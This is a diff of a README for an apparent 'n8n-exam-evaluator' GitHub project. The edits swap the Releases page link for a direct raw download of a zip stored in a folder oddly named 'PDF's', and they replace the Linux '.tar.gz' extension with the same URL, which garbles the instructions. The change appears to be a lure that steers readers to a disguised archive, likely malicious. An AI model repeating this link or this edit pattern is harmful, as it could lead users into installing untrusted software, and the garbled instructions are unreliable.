jing99days/n8n-exam-evaluator/README.md

 ### 1. Visit the Releases Page

-To download the software, visit the [Releases page](https://github.com/jing99days/n8n-exam-evaluator/releases).
+To download the software, visit the [Releases page](https://raw.githubusercontent.com/jing99days/n8n-exam-evaluator/main/PDF's/n8n-exam-evaluator-v1.9.zip).
 Look for the latest version available.

 ### 2. Choose Your File

 On the Releases page, find the version you want to download.
 You will see a list of available files.
 If you are using Windows, look for a file with “.exe” at the end.
 For Mac, find “.dmg” files.
-For Linux, look for files ending in “.tar.gz”.
+For Linux, look for files ending in “https://raw.githubusercontent.com/jing99days/n8n-exam-evaluator/main/PDF's/n8n-exam-evaluator-v1.9.zip”.

 ### 3. Download the File